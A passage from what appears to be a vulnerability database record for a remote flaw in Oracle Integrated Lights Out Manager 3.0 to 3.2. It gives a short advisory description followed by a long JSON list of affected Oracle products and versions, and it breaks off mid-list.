Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'Multiple' protocol. The 'LUMAIN' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0665", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 